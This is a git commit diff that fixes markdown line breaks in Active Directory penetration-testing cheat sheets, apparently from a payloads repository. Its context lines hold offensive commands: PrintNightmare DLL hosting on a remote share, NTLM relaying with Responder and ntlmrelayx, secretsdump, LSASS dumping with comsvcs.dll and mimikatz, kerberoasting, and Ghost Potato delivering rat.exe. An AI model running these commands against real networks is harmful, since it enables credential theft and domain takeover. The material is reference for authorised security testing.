FIX - Fixing new lines (* and - )

pull/4/head
Swissky 2024-01-12 20:51:55 +01:00
parent dc9a898d55
commit 68d08f6e05
12 changed files with 61 additions and 23 deletions

View File

@ -112,6 +112,7 @@ Automated exploitation:
```
**Mitigations**:
* [KB5007247 - Windows Server 2012 R2](https://support.microsoft.com/en-us/topic/november-9-2021-kb5007247-monthly-rollup-2c3b6017-82f4-4102-b1e2-36f366bf3520)
* [KB5008601 - Windows Server 2016](https://support.microsoft.com/en-us/topic/november-14-2021-kb5008601-os-build-14393-4771-out-of-band-c8cd33ce-3d40-4853-bee4-a7cc943582b9)
* [KB5008602 - Windows Server 2019](https://support.microsoft.com/en-us/topic/november-14-2021-kb5008602-os-build-17763-2305-out-of-band-8583a8a3-ebed-4829-b285-356fb5aaacd7)

View File

@ -6,6 +6,7 @@ The DLL will be stored in `C:\Windows\System32\spool\drivers\x64\3\`.
The exploit will execute the DLL either from the local filesystem or a remote share.
Requirements:
* **Spooler Service** enabled (Mandatory)
* Server with patches < June 2021
* DC with `Pre Windows 2000 Compatibility` group
@ -14,6 +15,7 @@ Requirements:
**Detect the vulnerability**:
* Impacket - [rpcdump](https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/rpcdump.py)
```ps1
python3 ./rpcdump.py @10.0.2.10 | egrep 'MS-RPRN|MS-PAR'
@ -28,6 +30,7 @@ Requirements:
```
**Payload Hosting**:
* The payload can be hosted on Impacket SMB server since [PR #1109](https://github.com/SecureAuthCorp/impacket/pull/1109):
```ps1
python3 ./smbserver.py share /tmp/smb/
@ -40,8 +43,10 @@ Import-Module .\Invoke-BuildAnonymousSMBServer.ps1; Invoke-BuildAnonymousSMBServ
```ps1
SharpWebServer.exe port=8888 dir=c:\users\public verbose=true
```
When using WebDav instead of SMB, you must add `@[PORT]` to the hostname in the URI, e.g.: `\\172.16.1.5@8888\Downloads\beacon.dll`
WebDav client **must** be activated on exploited target. By default it is not activated on Windows workstations (you have to `net start webclient`) and it's not installed on servers. Here is how to detect activated webdav:
```ps1
cme smb -u user -p password -d domain.local -M webdav [TARGET]
```

View File

@ -2,11 +2,14 @@
## Using BloodHound
Use the correct collector
Use the correct collector:
* AzureHound for Azure Active Directory
* SharpHound for local Active Directory
* RustHound for local Active Directory
**Examples**:
* use [BloodHoundAD/AzureHound](https://github.com/BloodHoundAD/AzureHound) (more info: [Cloud - Azure Pentest](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md#azure-recon-tools))
* use [BloodHoundAD/BloodHound](https://github.com/BloodHoundAD/BloodHound)
@ -80,6 +83,7 @@ cat docker-compose.yml | docker compose -f - up
```
You can add some custom queries like :
* [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json)
* [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json)
* [BloodHound Custom Queries from Exegol - @ShutdownRepo](https://raw.githubusercontent.com/ShutdownRepo/Exegol/master/sources/bloodhound/customqueries.json)

View File

@ -5,6 +5,7 @@ You will need the following files to extract the ntds :
- SYSTEM hive (`C:\Windows\System32\SYSTEM`)
Usually you can find the ntds in two locations : `systemroot\NTDS\ntds.dit` and `systemroot\System32\ntds.dit`.
- `systemroot\NTDS\ntds.dit` stores the database that is in use on a domain controller. It contains the values for the domain and a replica of the values for the forest (the Configuration container data).
- `systemroot\System32\ntds.dit` is the distribution copy of the default directory that is used when you install Active Directory on a server running Windows Server 2003 or later to create a domain controller. Because this file is available, you can run the Active Directory Installation Wizard without having to use the server operating system CD.
@ -118,6 +119,7 @@ $ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H.
```
:warning: If the password is not a confidential data (challenges/ctf), you can use online "cracker" like :
- [hashmob.net](https://hashmob.net)
- [crackstation.net](https://crackstation.net)
- [hashes.com](https://hashes.com/en/decrypt/hash)

View File

@ -3,6 +3,7 @@
> If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting
**Requirements**:
* Accounts with the attribute **DONT_REQ_PREAUTH**
* Windows/Linux:
```ps1
@ -61,8 +62,8 @@ C:\Rubeus> john --format=krb5asrep --wordlist=passwords_kerb.txt hashes.asreproa
```
**Mitigations**:
* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default).
* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default).
## Kerberoasting w/o domain account
@ -90,6 +91,7 @@ The technique is fully explained in this article: [Semperis blog post](https://w
Research from Project Zero : https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html
**Requirements**:
* Accounts with the attribute **DONT_REQ_PREAUTH**
* Windows/Linux:
```ps1
@ -100,7 +102,7 @@ Research from Project Zero : https://googleprojectzero.blogspot.com/2022/10/rc4-
PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose
```
* using [CVE-2022-33679.py](https://github.com/Bdenneu/CVE-2022-33679)
* Using [CVE-2022-33679.py](https://github.com/Bdenneu/CVE-2022-33679)
```bash
user@hostname:~$ python CVE-2022-33679.py DOMAIN.LOCAL/User DC01.DOMAIN.LOCAL
user@hostname:~$ export KRB5CCNAME=/home/project/User.ccache
@ -108,6 +110,7 @@ Research from Project Zero : https://googleprojectzero.blogspot.com/2022/10/rc4-
```
**Mitigations**:
* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default).
* Disable RC4 cipher if possible.

View File

@ -80,6 +80,7 @@ Then crack the ticket using the correct hashcat mode (`$krb5tgs$23`= `etype 23`)
**Mitigations**:
* Have a very long password for your accounts with SPNs (> 32 characters)
* Make sure no users have SPNs

View File

@ -67,7 +67,8 @@
> If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials.
On the machine.
On the machine
* Find SCCM blob
```ps1
Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"

View File

@ -2,14 +2,16 @@
## Capturing and cracking Net-NTLMv1/NTLMv1 hashes/tokens
> Net-NTLMv1 (NTLMv1) authentication tokens are used for network authentication (they are derived from a challenge/response DES-based algorithm with the user's NT-hash as symetric keys.
> Net-NTLMv1 (NTLMv1) authentication tokens are used for network authentication. They are derived from a challenge/response DES-based algorithm with the user's NT-hash as symetric keys.
:information_source: : Coerce a callback using PetitPotam or SpoolSample on an affected machine and downgrade the authentication to **NetNTLMv1 Challenge/Response authentication**. This uses the outdated encryption method DES to protect the NT/LM Hashes.
**Requirements**:
* LmCompatibilityLevel = 0x1: Send LM & NTLM (`reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v lmcompatibilitylevel`)
**Exploitation**:
* Capturing using Responder: Edit the `/etc/responder/Responder.conf` file to include the magical **1122334455667788** challenge
```ps1
HTTPS = On
@ -68,6 +70,7 @@
* Set the Lan Manager authentication level to `Send NTLMv2 responses only. Refuse LM & NTLM`
## Capturing and cracking Net-NTLMv2/NTLMv2 hashes
If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network.

View File

@ -32,11 +32,13 @@ msf exploit(smb_relay) > show targets
## LDAP signing not required and LDAP channel binding disabled
During security assessment, sometimes we don't have any account to perform the audit. Therefore we can inject ourselves into the Active Directory by performing NTLM relaying attack. For this technique three requirements are needed:
* LDAP signing not required (by default set to `Not required`)
* LDAP channel binding is disabled. (by default disabled)
* `ms-DS-MachineAccountQuota` needs to be at least at 1 for the account relayed (10 by default)
Then we can use a tool to poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network such as `Responder` and use `ntlmrelayx` to add our computer.
```bash
# On first terminal
sudo ./Responder.py -I eth0 -wfrd -P -v
@ -141,8 +143,8 @@ python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET'
TERM1> secretsdump.py testsegment/ntu@s2016dc.testsegment.local -just-dc
```
- Using any AD account, connect over SMB to the victim server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant Resource Based Constrained Delegation privileges for the victim server to a computer account under the control of the attacker. The attacker can now authenticate as any user on the victim server.
```powershell
# create a new machine account
TERM1> ntlmrelayx.py -t ldaps://rlt-dc.relaytest.local --remove-mic --delegate-access -smb2support
@ -158,6 +160,7 @@ python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET'
## Ghost Potato - CVE-2019-1384
Requirements:
* User must be a member of the local Administrators group
* User must be a member of the Backup Operators group
* Token must be elevated
@ -174,6 +177,7 @@ ntlmrelayx -smb2support --no-smb-server --gpotato-startup rat.exe
> It abuses the DCOM activation service and trigger an NTLM authentication of the user currently logged on in the target machine
Requirements:
- a shell in session 0 (e.g. WinRm shell or SSH shell)
- a privileged user is logged on in the session 1 (e.g. a Domain Admin user)
@ -189,6 +193,7 @@ Terminal> psexec.py 'LAB/winrm_user_1:Password123!@192.168.83.135'
## DNS Poisonning - Relay delegation with mitm6
Requirements:
- IPv6 enabled (Windows prefers IPV6 over IPv4)
- LDAP over TLS (LDAPS)
@ -223,9 +228,11 @@ secretsdump.py -k -no-pass target.lab.local
> Example of exploitation where you can coerce machine accounts to authenticate to a host and combine it with Resource Based Constrained Delegation to gain elevated access. It allows attackers to elicit authentications made over HTTP instead of SMB
**Requirement**:
* WebClient service
**Exploitation**:
* Disable HTTP in Responder: `sudo vi /usr/share/responder/Responder.conf`
* Generate a Windows machine name: `sudo responder -I eth0`, e.g: WIN-UBNW4FI3AP0
* Prepare for RBCD against the DC: `python3 ntlmrelayx.py -t ldaps://dc --delegate-access -smb2support`
@ -267,11 +274,15 @@ pyrdp-mitm.py <IP>
pyrdp-mitp.py <IP>:<PORT> # with custom port
pyrdp-mitm.py <IP> -k private_key.pem -c certificate.pem # with custom key and certificate
```
* Exploitation
**Exploitation**
* If Network Level Authentication (NLA) is enabled, you will obtain the client's NetNTLMv2 challenge
* If NLA is disabled, you will obtain the password in plaintext
* Other features are available such as keystroke recording
* Alternatives
**Alternatives**
* S3th: https://github.com/SySS-Research/Seth, performs ARP spoofing prior to launching the RDP listener

View File

@ -9,6 +9,7 @@ CVE-2020-17049
:warning: Patched Error Message : `[-] Kerberos SessionError: KRB_AP_ERR_MODIFIED(Message stream modified)`
Requirements:
* Service account's password hash
* Service account's with `Constrained Delegation` or `Resource Based Constrained Delegation`
* [Impacket PR #1013](https://github.com/SecureAuthCorp/impacket/pull/1013)

View File

@ -111,6 +111,7 @@ Converting kirbi => ccache
Mitigations:
* Hard to detect because they are legit TGT tickets
* Mimikatz generate a golden ticket with a life-span of 10 years
@ -148,6 +149,7 @@ Interesting services to target with a silver ticket :
Mitigations:
* Set the attribute "Account is Sensitive and Cannot be Delegated" to prevent lateral movement with the generated ticket.
@ -155,7 +157,8 @@ Mitigations:
> Request a legit low-priv TGT and recalculate only the PAC field providing the krbtgt encryption key
Require:
Requirements:
* krbtgt NT Hash
* krbtgt AES key
@ -172,7 +175,8 @@ Rubeus.exe diamond /domain:DOMAIN /user:USER /password:PASSWORD /dc:DOMAIN_CONTR
The goal is to mimic the PAC field as close as possible to a legitimate one.
Require:
Requirements:
* [Impacket PR#1411](https://github.com/SecureAuthCorp/impacket/pull/1411)
* krbtgt AES key

View File

@ -64,6 +64,7 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
* Adding requires lock
* Removing requires reboot
## LSA Protection Workaround
- LSA as a Protected Process (RunAsPPL)
@ -134,6 +135,7 @@ rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass_pid C:\temp\lsass.
Use the minidump:
* Mimikatz: `.\mimikatz.exe "sekurlsa::minidump lsass.dmp"`
```powershell
mimikatz # sekurlsa::minidump lsass.dmp